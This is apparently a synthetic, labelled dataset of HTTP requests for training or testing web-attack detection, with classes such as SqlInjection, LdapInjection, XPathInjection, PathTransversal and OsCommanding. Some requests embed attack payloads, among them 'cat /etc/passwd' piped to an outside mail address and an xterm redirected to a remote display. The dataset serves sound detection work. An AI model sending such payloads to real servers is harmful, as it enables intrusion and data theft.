Trailer: Trailer
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 5.8; ae-hr; rv:2.0.9) Gecko/63348201
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8071x836
Via: HTTP/0.7 22.174.38.211
Transfer-Encoding: gzip
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 934 182.60.171.172 "mrhrn7etePlbs" 
X-Forwarded-For: 112.65.225.240
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48143
Start - Id: 2747
class: Valid
GET /Ce.B/rAgXmogV@A/uxG/h.ocRUR1GqEl/4htt2oea9g.jpeg?sslyt=O&hambi=%247osatmpIs&eldne9s=nniob&rgn=t_f5cS3i9G&UzMUc=%3Ce&afnieirsyba=59 HTTP/1.0
Host: 52.177.186.75
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic;q=0.5, hz-gb-2312, x-mac-chinesetrad;q=0.7, koi8, x-mac-chinesetrad;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 133.135.129.178
Cookie: o6hooa=744859
Cookie2: $Version="7"
Date: Wed, 27 Sep 06 06:22:37 GMT
ETag: "tM0h4IJKy1GWUH4D"
Expect: dme7rmse=ehoeoct
From: lqlhi@vaenn.fr
If-Modified-Since: Tue, 28 Sep 04 15:12:07 GMT
If-Unmodified-Since: Sun, 18 Nov 07 12:44:16 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Aug 05 03:19:09 GMT
Max-Forwards: 777
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b25oczpsbHlxQU5pcg==
Range: 8-,-0,6-
Referer: http://2rTuEi.st/s1tr9s/f683dki.txt
TE: trailers
Trailer: TE
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 7.8; ct-de; rv:7.3.1) Gecko/26245303
UA-CPU: PowerPC
UA-Disp: 8477,4425,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 738x004
Via: FTP/3.5 www.htle.shtml, 6.3 149.194.226.31:60
Transfer-Encoding: theA
Upgrade: r59ed/3.7, stec/5.6
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2747
Start - Id: 35271
class: SqlInjection
GET /hiehDao/rrr/n8lmzlcwlt/r5WF-qqn/NRnCPcJ1iframeKL/f2r6errlwort/1sRODv8connectv/tbCr_381XHjO3K/rano7Eqikais/Ircinputfl6.winnt1xgw/yPSnFHNJ/741nsl9ltsEEf4rioidi.css?gtmpT2y=3115&ohgpenzamshy=pwrgnone&updatePbVmb=5%25processing-instructionh+s%40&atdTci=r%2Feve%3B%2632yopen%5Dgdr%5B&ejnetidbgmpm3=7Zb&syexblondteg=%3F%25%5C4q28p6je&khBn5xohiXj=htpasseeSa&ean7aTpeiTehO=28294&dw=oEx.T6bM&itencl6teeb=Jo0&1tk=%27%3B++drop+table++++p5zRw&ihhlit=m9 HTTP/1.0
Host: www.oeiev.be
Connection: keep-alive
Accept: text/html;q=0.2, audio/x-wav, text/*;q=0.1
Accept-Charset: x-mac-turkish;q=0.6, iso-8859-5;q=0.9, gb2312, x-mac-chinesesimp;q=0.9, koi8;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=64736
Client-ip: 155.132.155.102
Cookie: seherm0=tooee48;Tniiinm=nynqscp:4l;b=aed9;lcarDao=nn;as=ssttaaFcEruyiw;iV=yEn
Cookie2: $Version="87"
Date: Thu, 17 Jun 04 02:55:56 CET
ETag: "bvEbhRuWJy1AnSCQb"
Expect: er8mb=9eoathib
From: giofe60@1lflop.de
If-Modified-Since: Tue, 30 Sep 08 10:57:26 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:22:25 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 179
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oCgves"
Authorization: n7ouho 0tad=wpehygri
Range: 930-456,2355-
Referer: /tubee/ytbg/ublc.js
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.2 (Windows; U; Win98 0.3; ly-1o; rv:9.4.1) Gecko/80084633
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: FTP/7.5 www.ac1art.jpeg, FTP/4.7 www.rancoo.shtml
Transfer-Encoding: deflate
Upgrade: p0emTn/7.1, nmstn/3.3
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 32650890830963017
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35271
Start - Id: 36861
class: LdapInjection
GET /usmrrnnxyzetagesN/zi4rhtotttiyc6s/uLxSH2gE_YZiK5b9q/ieteaIoIEoorrcnui/7JnPONcd1CNX0UFui1X7/FQPnVhg9/dPK.png? HTTP/1.0
Host: www.gpeieew.be:80
Connection: zrndye
Accept: image/*, image/gif, image/png
Accept-Charset: euc-tw, euc-tw;q=0.2, iso-8859-1;q=0.2, x-mac-greek;q=0.3, windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: 5089)(&(objectClass=itiu)(|(sn  =jat)(cn=hne   J*))
Cache-Control: max-age=61878
Client-ip: 119.184.144.170
Cookie: tmiHnEenpn=595956826
Date: Sat, 04 Dec 04 20:35:13 GMT
If-Range: "fz1gbnS_dC3mVHaw"
Pragma: no-cache
Authorization: Digest uri=/e8aNs.asp
Referer: /uimtOwea/neohe/e6wr/5Ii9r.wav
User-Agent: ihehsacl/9.0.1.7.3
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36861
Start - Id: 14858
class: Valid
GET /th6silyuw8hpeof/JRj0KalIz/J1Achild.bodyeYV7v/n4T/iRrX.hwjAS9wSD/r4stnLs/o1trd33ab4eooe6edg.jsp?jrhsgyo=tprocessing-instructionh%27Z%3Ft%3D4%5Cn%2F5%27eval%3Dsr&XEPkj6%uX=nrsNfrdiqe6eEigbq2&t1Womnhxa7e9a=14695&jipehsqA=eQUKo%40&@hsr@=0231&Ohglst98Lrbldvd=bhr6Cy&VrUc=aH%25bh&ntdcQnMt=entso4s&s2p7atthurnOo=z&0yum3e2ue6=gOegcmwexd7da8Ah&sasssxePp8=en5&T6n_f=diebifqagrN0raic&vbscriptKjP=rrezoesLeez&ioyle3bi=fratbH6p HTTP/1.1
Host: www.eyps.de
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-cyrillic, utf-7, euc-cn;q=0.2, windows-1252;q=0.6, windows-1253
Accept-Encoding: *
Accept-Language: tcscrarn-ismEns, ipclnlk-Cnvll;q=0.8, ol-tsxu0e;q=0.9, maes-eehia, bebl-dfpv
Cache-Control: min-fresh=3646
Client-ip: 138.69.215.50
Cookie: L9rfsrzElioi2a=opasswd;qXX@gF=rbetlel;svdhoin=passwddropbph;td0auvwotwE8=489362047
Cookie2: $Version="63"
Date: Sun, 26 Sep 04 03:32:54 GMT
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 100-continue
From: doomanl@8w3rc.it
If-Modified-Since: Wed, 12 Oct 05 14:00:22 CET
If-Unmodified-Since: Thu, 31 Jan 08 19:42:02 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: NTLM d25hMmVobmtyZHRGb2F0bnVvbGNkY3ZhbWNlQ284dGVpdA==
Range: -43,-61335,692292-223
Referer: /a2bwr.mpeg
TE: chunked;q=0.4,gzip;q=0.1
Trailer: Referer
User-Agent: 2sofet (i703ltMzc; h0YoW_Ou; fpqv3YmT_; 2CBhWIsI; u_jz4Rrqf)
UA-CPU: 68000
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: FTP/5.0 5.238.140.24
Transfer-Encoding: compress
Upgrade: orhoc/2.2, Sguidv/0.2, 9Hz/1.4, Qxua/9.4
Warning: 213 236.96.3.168:19736 "nptdunamnns7" "Fri, 30 Jun 06 14:46:01 CET"
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 883982110
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 14858
Start - Id: 37911
class: LdapInjection
GET /hyaro/mh-y0Jz1-Yj2.gif?neAehoaM=5871324&eraosnpsi7U=+srw&daerioBsIh=%29++++%28+++%7C%282Ncm%3Drell*%29 HTTP/1.0
Host: 180.137.107.186
Connection: close
Accept: */*
Accept-Charset: windows-1250, x-mac-roman;q=0.8
Accept-Encoding: gzip, deflate;q=0.0, identity, compress
Accept-Language: 3odc7-8;q=0.5, e70-et
Cache-Control: only-if-cached
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="4"
Date: Wed, 29 Oct 08 16:54:18 GMT
ETag: "wOq5RcWCDamiFvJi"
Expect: aPouw=afta
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 20 Aug 07 03:16:40 UTC
If-Unmodified-Since: Thu, 25 Oct 07 16:53:49 CET
If-Match: *
If-None-Match: "nn.aGJcXiGQ.bxX9"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 548
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: NTLM a0V0U2ZnYXJ1aG9ocG9lcmNlb3RlZDRic2xvYWtpODRjZGlLOHM=
Range: -8
Referer: http://www.etl8.st/bhaandrl/dtio/ntnrdr0S/2Ytuo/c1ep.swf
TE: chunked,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/2.7 (X11; U; Linux i586 6.8; a0-tJ; rv:5.6.4) Gecko/29867985
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: identity
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 03021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37911
Start - Id: 39098
class: LdapInjection
PUT /8tytRTSose4nta/access_logmail/aNsEB52F3wj/sqhe/iefei/c-brml9lbzQF-EZSu7/sm3BWelinJ8oUr0.mspx? HTTP/1.1
Content-Length: 132
Content-Language: t,uhrNtNr,ersoai5
Content-Encoding: identity
Content-Location: /or0gb/esse.txt
Content-MD5: V2V0ZXg4eHhvZ2lzZXRsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Feb 10 16:34:32 GMT
Last-Modified: Thu, 16 Sep 04 19:44:02 GMT
Host: www.vwdi2uieno.biz:80
Connection: close
Accept: video/mpeg;q=0.2
Accept-Charset: iso-2022-kr;q=0.5, x-mac-japanese
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 133.82.168.94
Cookie: NDIBBfromU8H2=)  (    | (  cn=*o    'brien*   )(mail  =*o  'brien*   ) ;s9itnjouad=ma;5mlx0VpTphpk.=ecw
Cookie2: $Version="208"
Date: Sun, 18 Nov 07 15:33:19 CET
ETag: W/"zSESMi609uroL3G"
Expect: hhhrtm
If-Modified-Since: Fri, 29 May 09 08:52:00 GMT
If-Unmodified-Since: Mon, 29 Mar 04 19:16:34 GMT
If-Match: "eSvWpqsI@6bZDBW0R"
If-None-Match: *
If-Range: "xry4hEVnv_bBE2TR"
Max-Forwards: 3796
Pragma: 5ecep='ai'
Proxy-Authorization: Oepo noik7=mRrhkzi
Authorization: Basic bG5pZXA6RW5IZWpo
Range: -3,502-
Referer: http://www.ETuuxdeO.ch/EcylhH/SlsbErzm.shtml
TE: chunked;q=0.1
Trailer: Host
User-Agent: ivrcn3T (sJmMgjHo; 3DdmnOraW; n3wRbLBYB; aKzqico)
UA-CPU: Sparc
UA-Disp: 873,752,8
UA-Color: color32
UA-Pixels: 825x605
Via: 4.2 221.132.52.231, 1.0 www.7gge.png:1
Transfer-Encoding: gzip
Upgrade: 7eeKe/5.6, Suar/6.3
Warning: 156 www.anuenrdb.jpg "stUa8h3rlELwts" 
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 310798442900
----: ---------------------
~~~~~: ~~~~~~~~~~

ehie9lqd3=0fo&oezo7aiaebztprt=5232507&mpVnsaNeyIe4n=iY&tphcOtorEjwm=pemep2mnu\9eps&tTtbdoo=6&irfio9=aCD_79JS&keaoeT=ovxmlvbscripty

End - Id: 39098
Start - Id: 43207
class: OsCommanding
GET /o1i5BI_DU78.dll?es=kte%40%40vtko52&8esu=woeuteyr&lAN2k=saos&iframezdocumentsB=oma%3Ase+evarsno&2eb=8345263136&inredrzitzr=6330&Bahroe=080233&r8=plhxRlin3uAee&iser5itEyc=%250A++++xterm+++++-display+++++www.ilnt.com%3A0.0++ HTTP/1.0
Host: www.atdt.cz
Connection: n6nbczno
Accept: video/quicktime;q=0.7
Accept-Charset: koi8, iso-2022-jp, x-mac-japanese, koi8-r
Accept-Encoding: identity;q=0.0
Accept-Language: rBtf1-fgTi, ypiaa-tiez0rs;q=0.0, hfnpr-aq2, ypeoi-aegI42ot, VdiySoee-raSh5h;q=0.2
Cache-Control: no-cache
Client-ip: 59.228.253.1
Cookie: Ins=7
Cookie2: $Version="350"
Date: Sat, 29 May 04 16:26:48 GMT
ETag: "XR31.2u_UhvXSfees"
Expect: nits
From: eena@eaooz.de
If-Modified-Since: Wed, 30 Jul 08 07:18:38 UTC
If-Unmodified-Since: Sun, 06 Jan 08 03:50:28 CET
If-Match: *
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: *
Max-Forwards: 722
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 66907-4
Referer: /onh3/eo3elb.mdb
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.1 (Windows; U; WinNT 5.8; b0-dt; rv:0.6.5) Gecko/30770047
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: Eo3t/2.6 180.34.222.135, FTP/5.1 www.h6cCDsln.js
Transfer-Encoding: ncrazu; eia7=j9fe9
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43207
Start - Id: 11708
class: Valid
GET /5PNEKIyhtaccesY/4gzEu5Ccc2ifxS/l_W/cS6Nformw/stmdsr/tt-pvYrxMs/aHdjOmgw1GbZQC/JW.jpeg? HTTP/1.1
Host: 58.171.155.196
Connection: Thtin4bs
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.9, iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 228.241.203.171
Cookie: 3iaUaRhdIsa=175;ai4ep7dts2e=7637;FLVVnull=h;vameoheiOoye=4422217822
Cookie2: $Version="830"
Date: Wed, 27 Oct 04 04:11:32 CET
ETag: W/"YTbPSJ_io3J4e-wVZ0sy"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Wed, 16 Apr 08 08:34:51 GMT
If-Unmodified-Since: Thu, 22 Jul 04 21:10:34 CET
If-Match: ".wAAcK-WcSiiZb3Y"
If-None-Match: *
If-Range: Thu, 15 Feb 07 02:03:44 CET
Max-Forwards: 6661
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: NTLM NjZlZWVOb2V0dkV6UmVpYWV5SGVlZ2hpZWd0dG1hdDB0NUV1ZU9X
Range: 9808-4454,-4,572-193568
Referer: /ye5V.asmx
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.3 (compatible; MSIE 7.7; Open BSD i386; wiaOmcee)
UA-CPU: x86
UA-Disp: 940,7536,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8474x4418
Via: HTTP/9.7 www.oiai.htm
Transfer-Encoding: gzip
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 482 www.edeet.html "st2tianaieN" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11708
Start - Id: 31990
class: Valid
GET /8usUSoYbaQzmxp_B7/rO-Hvig-m7yAE.1/rRw-2q1HH8jzL/agieycic33374ven4Na/ea0ess/tYTQsROZxhHubIGG/ih/gtdo/cufADBe8Rsqd7riN7Ra/sNod/hgSRFS.jsp?iaaulpmjbe=scriptl+oakrh%2FD%29zie&ne=912&ueEaoy1ohhladc=fmp&-Th6PWeEp=nbLBq_cKI-&aoelwosehwil59=ar&jer=3141&nq=her-t HTTP/1.0
Host: 18.148.234.199
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.9, utf-7, euc-cn
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 131.149.91.210
Cookie: 5bxspe3eeaT=675902476
Cookie2: $Version="5"
Date: Sun, 29 Jun 08 20:58:55 CET
ETag: W/"7RTLYC0kdTbJYfHK2wv."
Expect: 100-continue
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Tue, 05 Jan 10 24:17:46 CET
If-Unmodified-Since: Sat, 13 Oct 07 01:04:03 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Sep 04 11:23:44 CET
Max-Forwards: 5776
MIME-Version: 6.1
Pragma: ahlyxuuo='f'
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: etsH5t isrblA=sicwgs
Range: -63549
Referer: http://tEivaMve.uk/hlEue.mdb
TE: gzip
Trailer: Upgrade
User-Agent: w8st7nilnlehurfpu1
UA-CPU: Sparc
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3694x8259
Via: 7.4 117.235.104.195:136, HTTP/3.9 222.204.175.82
Transfer-Encoding: deflate
Upgrade: gUom/8.8, j5tt8t/4.9, qci1m/1.5, KtS/4.6, e3ecl/0.4
Warning: 334 109.21.12.244 "syTthysdtcj6teaty7" "Sat, 23 Jan 10 14:32:37 GMT"
X-Forwarded-For: 241.255.67.216
X-Serial-Number: 811726
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31990
Start - Id: 35944
class: PathTransversal
GET /yALfWvdnSH87admin/nalitotaskE6/sgecktYnswhsnaixf6/jRHqd0p8EopoyA/yiA/rmMTDIExtermhtpassIcU@bgsoundc/s5yJaz9qHD2KPwtGb/dulNejTeor/eUWYegKGIeq/p3ibhaving5r.gif?5pnien=UEIeneeakipspa&HxmlRvLJ=oomar6fo5&e8L=johdzhDol7T&se=%2Fi&n5iz7vx3=0lhcnrO58&OIZ_RXE=%3C%21--++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E HTTP/1.1
Host: www.ottn.com
Connection: keep-alive
Accept: audio/basic;q=0.5, audio/*
Accept-Charset: koi8-r;q=0.9, utf-8, x-mac-arabic;q=0.0, iso-8859-8;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 107.17.117.247
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="19"
Date: Mon, 01 Nov 04 04:21:17 GMT
ETag: W/"GoOFLib-BwoAkUjow"
Expect: tesEzam
From: o7ke@eilLnnyAGi.org
If-Modified-Since: Sat, 15 Aug 09 20:37:58 UTC
If-Unmodified-Since: Fri, 16 Sep 05 06:30:43 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Apr 10 02:42:46 UTC
Max-Forwards: 164
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="dIrvs"
Authorization: Digest algorithm=m2uoga
Range: -25,5895-
Referer: /ruaci8n/whrege/9jwdiy/Htiuarbo/sLcaan.msf
TE: trailers,trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: Mozilla/8.4 (X11; U; Unix 1.6; eo-ae; rv:6.1.1) Gecko/16491794
UA-CPU: 68000
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 926x3351
Via: 1.7 145.24.126.106
Transfer-Encoding: deflate
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
X-Serial-Number: 2416806
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35944
Start - Id: 43139
class: OsCommanding
GET /nR.Vc9Rf-XRNL-Qb@@/eV.nsf?tc33dte23yat=oiframebgsoundrA&eot=616&vkPnieq7pegc=1474&Ciin=Ctl1&ncZYRk6K1=112063&ansed3pk=94&ELY4=areewl&6l=l9hhaaui2s9rao&lseyEJ9snwfmz8=apWlixun5EOItea&.ZiframeQs=w8%3B6es&awvltatg=tnxost+31&iframe3kt_HLp=peon%3Faa%5Bee%5BTpl%27shutdownisu&OeruheNrge=s%27ei&RI0X64Ko=oops++%3B++cat++%2Fetc%2Fpasswd+++++%7Cmail+your%40ahvoo.com&5qoo6boOtigylLc=e+g HTTP/1.1
Host: www.xaskldzIa.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 203.26.22.181
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="5"
Date: Fri, 01 Jan 10 18:53:35 GMT
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: riuusi2e=neiyivtb
From: ndud@rzo8frE.cz
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Sun, 20 Jun 04 05:58:13 UTC
If-Match: "J2aanYcaIyVZ7g5W"
If-None-Match: "Rlk92eN57i9yb_UtBo9c"
If-Range: "bhXDUrHYIRYupywyj"
Max-Forwards: 42
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest realm
Range: 46359-,93372-15,76-
Referer: /stcSoy/qsmtn.msf
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: a4pHVI_V-W http://www.6wpBbs.it
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 699x046
Via: 0.7 239.93.51.200:4, 1.7 97.92.184.77
Transfer-Encoding: identity
Upgrade: irotn/6.8
Warning: 904 www.jerlys.js "mltO" 
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 413241650
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43139
Start - Id: 5463
class: Valid
POST /hGrK7OJ21x1c.aspx? HTTP/1.1
Content-Length: 64
Content-Language: ccy
Content-Encoding: deflate
Content-Location: /tapCs/cehicn/wxtoa5i/Atxirad.asp
Content-MD5: cnJlb29pRWg1b2U3eUFDbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Nov 08 03:55:38 CET
Last-Modified: Thu, 22 Jan 04 15:29:28 GMT
Host: 226.49.125.72
Connection: keep-alive
Accept: audio/*, image/png, image/jpeg
Accept-Charset: windows-1250
Accept-Encoding: *
Accept-Language: jtara-0jrs
Cache-Control: Iem6tnr=Oir
Client-ip: 45.222.201.177
Cookie: sil=oMjB-o@Pp;bjpjaocihtM3n8r=05790758;i5pz=4809
Cookie2: $Version="55"
Date: Thu, 17 Nov 05 08:45:13 CET
ETag: W/"MbtmetX_lvBRSRuluA"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Tue, 07 Oct 08 16:56:24 UTC
If-Unmodified-Since: Mon, 14 Jan 08 05:59:27 GMT
If-Match: *
If-None-Match: "Knr1dM7x@.3H@sEwqSo"
If-Range: Fri, 07 Nov 08 02:07:42 GMT
Max-Forwards: 2
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: Digest realm
Range: 25867-
Referer: /roth/rutwcro/8Smn.jsp
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: ohx49asxf (euBhl-; a5CHlNqez; nHTORSj4F; abfl0nGWpt)
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2059x834
Via: 8.3 0.177.65.4
Transfer-Encoding: identity
Upgrade: rU2fTf/8.3
Warning: 491 www.oslwek6d.jpeg "8ehtsoioNMA22qLoeil" "Sat, 30 Jun 07 11:58:04 CET"
X-Forwarded-For: 213.143.185.128
X-Serial-Number: 757852
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ZDDacceptqC.9@Tcat=uOAJ@QH4qCc&l7=SyaHrHan7&fx9qhvnelhjT8w= se

End - Id: 5463
Start - Id: 50002
class: XPathInjection
POST /_w7AG8bpRcDJG/oPY2_LkKNkMQI.8/_i4SlSuwgetH7eN/locationGSEhiFC7OmXCM/eqGrF@L-H5g3xe@DZ/occgiscnenynwM7/dw2BrP/norzs3.asp? HTTP/1.1
Content-Length: 130
Content-Language: N8e2,nh8cwre
Content-Encoding: identity
Content-Location: /gHTpttv/rNeumaee/2ooa.dll
Content-MD5: ck1TbW52Z09uYXQyeG5yZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Jan 05 10:50:29 GMT
Last-Modified: Thu, 20 Apr 06 04:55:08 GMT
Host: www.Aj37.biz
Connection: Lmsc
Accept: audio/x-wav;q=0.1, image/png, text/html;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: Fe45f3-ipw;q=0.8, 9TRs-eYdj1j;q=0.7, lnttnwy-A, ir4eLh-pinn8, ehehit0e-Ftk;q=0.6
Cache-Control: no-cache
Client-ip: 177.9.17.154
Cookie: eftf=e-RcYjT;eh5qdhibuzs=244309;hSnfutVuAenog6=tUF54RZ;mlGk7o=ugujMsnehnRti;poavB9Udaotroie=487
Cookie2: $Version="6"
Date: Fri, 24 Aug 07 11:23:35 CET
ETag: "uXS1_vLt9nQGzEKhQH"
Expect: SEeuet
From: etjd@onalE.be
If-Modified-Since: Sat, 13 Sep 08 20:10:55 GMT
If-Unmodified-Since: Sun, 17 Dec 06 22:06:44 CET
If-Match: "X_JEa3J6PrqCTWOqUg"
If-None-Match: *
If-Range: Tue, 17 May 05 16:49:48 CET
Max-Forwards: 37
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: egErr TfEaua=iOrh
Authorization: qetsi haat5=cptst
Range: 1-0902
Referer: http://www.hjmnirob.be/MatukwI.cgi
TE: deflate
Trailer: Date
User-Agent: i8oh' or   rOo/elyen/child::node()[processing-instruction()=43]    or  'obeetrin' ='
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Win98
UA-Pixels: 957x1532
Via: 3.6 192.109.251.159, 7.3 176.244.104.209:1108
Transfer-Encoding: identity
Upgrade: rhja8/8.7
Warning: 930 www.EosRdrh.tiff "etleodlp" 
X-Serial-Number: 1430325
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GissGshnt7a=dFmC&ati=iSJ&QorO.ps=xt5rvpasta&i3nna4Zu=439&3TsNntssaI=oSYcWE&imv8jSurdghiath=65405&noazdtieueaterl=79439&eL=mTFZCnH7

End - Id: 50002
Start - Id: 29188
class: Valid
GET /EmapiIeKoeam0e1hwlv8/nnjeeeiSacsMTdi39d.mdb?xghniLttE=script4u%2F%3Aa+%3Fez%3Ebt2&processing-instruction24@Dm=tmpog&em6psecoaixah=s%7CursS%2F6r5ak7h&qiuBiwrr9=rdof1nnEsr&srvi3ora9ejc=4iwib HTTP/1.0
Host: 244.221.158.193
Connection: ofi6OnO
Accept: */*
Accept-Charset: windows-1258, utf-8, iso-8859-2, ks_c_5601-1987;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: max-age=7
Client-ip: 214.155.190.210
Cookie: eg=ejnu0fre;qepeWe=685
Cookie2: $Version="44"
Date: Tue, 02 Dec 08 15:18:40 UTC
ETag: W/"m7yYCAjTfLrZUPWx"
Expect: ekht
From: 4otngeu@itoo.net
If-Modified-Since: Wed, 29 Sep 04 20:58:03 UTC
If-Unmodified-Since: Mon, 04 May 09 14:26:10 CET
If-Match: *
If-None-Match: "MK.wKC8a1TvrPyi"
